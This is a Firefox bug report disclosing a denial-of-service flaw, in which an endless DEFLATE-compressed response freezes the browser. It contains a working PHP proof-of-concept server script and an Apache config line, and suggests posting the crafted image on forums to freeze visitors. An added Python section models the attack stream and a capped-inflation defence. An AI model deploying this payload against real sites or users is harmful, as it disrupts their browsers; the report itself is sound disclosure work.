Crafted infinite deflated content locks up Firefox

Status: UNCONFIRMED
Assignee: Unassigned
Product: Core
Component: Networking: HTTP
Priority: P5
Severity: critical
Reported: 5 years ago
Last modified: 4 months ago

People: Reporter: Cathy J. Fitzpatrick (Unassigned)

Tracking: Version: 17 Branch; Points: ---
Firefox Tracking Flags: (Not tracked)

Details: Whiteboard: [necko-would-take]
Description (Reporter, 5 years ago)

User Agent: Mozilla/5.0 (X11; Linux i686; rv:17.0) Gecko/20100101 Firefox/17.0
Build ID: 20121130221523

Steps to reproduce:

Currently, Firefox (tested on 17.0.1 on GNU/Linux) locks up when attempting to load deflated content when (a) the content does not end and (b) the content is sent in sufficiently large chunks.

For proof of concept, see http://shared.cathyjf.com/crafted-image.png which is a crafted "image" that should lock up Firefox within a couple of seconds, rendering it nonresponsive to any further input. This image can be embedded on other pages, and then those pages will lock up Firefox as well. It's probably even more potent if you embed several of these images on one page.

One potential application of this issue is that anybody could post something like [img]http://shared.cathyjf.com/crafted-image.png[/img] on a forum and then any Firefox users viewing the forum would be locked up.

The crafted-image.png file is actually a trivial PHP program, specifically the following program:

<?php
// Serve as an image so the URL can be embedded with <img> or [img] tags.
header('Content-type: image/png');
// One 60000-byte line of spaces ending in "0\n": highly compressible.
$s = sprintf("%60000u\n", 0);
// Never terminate: the response body has no end.
while (true) echo $s;
?>

To deploy on Apache, you would have to set something like this in the .htaccess file:

AddOutputFilterByType DEFLATE image/png

Actual results:

http://shared.cathyjf.com/crafted-image.png causes Firefox to lock up

Expected results:

Firefox should not lock up
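The mechanism in the report is a never-ending, highly compressible DEFLATE body: a few kilobytes on the wire inflate to megabytes, and a client that keeps inflating until the stream ends never finishes. The following Python example is added here and is not part of the bug, Firefox's networking code, or Mozilla's fix; it models the server side of the PoC (the same 60000-byte line, compressed with the zlib wrapper that Content-Encoding: deflate uses, with one Z_SYNC_FLUSH per line as a stand-in assumption for how mod_deflate chunks the output) and shows the check a client decoder needs: inflate in bounded slices and abort once the decompressed total exceeds a cap, rather than buffering until end-of-stream. The cap values and the `InflateLimitExceeded` name are this example's own choices.

```python
import zlib

# Constructed sample mirroring the PoC: a 60000-byte line of spaces ending in "0\n".
LINE = ("%60000u\n" % 0).encode()


def compress_lines(num_lines):
    """A finite, properly terminated zlib stream of num_lines copies of LINE."""
    comp = zlib.compressobj(level=6)
    return b"".join(comp.compress(LINE) for _ in range(num_lines)) + comp.flush()


def crafted_deflate_chunks():
    """Infinite generator of zlib-wrapped DEFLATE chunks, like a never-ending
    response body compressed on the fly. Each chunk is flushed with
    Z_SYNC_FLUSH (assumption: one flush per line) so a client can decode it as
    soon as it arrives; the stream itself never reaches end-of-stream."""
    comp = zlib.compressobj(level=6)
    while True:
        yield comp.compress(LINE) + comp.flush(zlib.Z_SYNC_FLUSH)


class InflateLimitExceeded(Exception):
    """Raised when decompressed output passes the configured cap."""


def bounded_inflate(chunks, max_output, sink=None, max_length=1 << 16):
    """Inflate a sequence of DEFLATE chunks with a hard cap on output.

    Returns (bytes_in, bytes_out, finished). Output is produced in slices of
    at most max_length bytes and handed to `sink` (any callable taking bytes),
    so memory stays O(max_length) instead of O(bytes_out). Raises
    InflateLimitExceeded as soon as more than max_output bytes have been
    produced, which is what stops the infinite stream from locking the caller.
    """
    dec = zlib.decompressobj()
    bytes_in = bytes_out = 0
    for chunk in chunks:
        bytes_in += len(chunk)
        data = chunk
        # Loop until this chunk's input is fully consumed; with max_length set,
        # zlib parks any unprocessed input in unconsumed_tail.
        while data:
            out = dec.decompress(data, max_length)
            bytes_out += len(out)
            if sink is not None and out:
                sink(out)
            if bytes_out > max_output:
                raise InflateLimitExceeded(
                    "inflated %d bytes from %d compressed bytes, cap is %d"
                    % (bytes_out, bytes_in, max_output))
            data = dec.unconsumed_tail
            if dec.eof:
                return bytes_in, bytes_out, True
    return bytes_in, bytes_out, False


if __name__ == "__main__":
    # Finite stream: decodes completely and reports the compression ratio.
    bytes_in, bytes_out, done = bounded_inflate([compress_lines(100)], max_output=10**9)
    print("finite: %d -> %d bytes (ratio %.0f:1), finished=%s"
          % (bytes_in, bytes_out, bytes_out / bytes_in, done))
    # Infinite stream: the cap turns an endless decode into an error.
    try:
        bounded_inflate(crafted_deflate_chunks(), max_output=1_000_000)
    except InflateLimitExceeded as exc:
        print("infinite:", exc)
```

The cap here is on absolute output size; a production decoder would usually also bound the ratio of output to input and the wall-clock time spent inflating, and surface the abort as a network error for that resource rather than stalling the whole client.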

Updated (Reporter, 5 years ago):
Severity: normal → critical

Updated (Reporter, 5 years ago):
OS: Linux → All
Hardware: x86 → All
Version: unspecified → 17 Branch

Comment 1 (Reporter, 5 years ago):
Public version at Bug #832586.
Opening per Cathy's request.
Group: core-security
Component: General → Networking: HTTP
Whiteboard: [necko-would-take]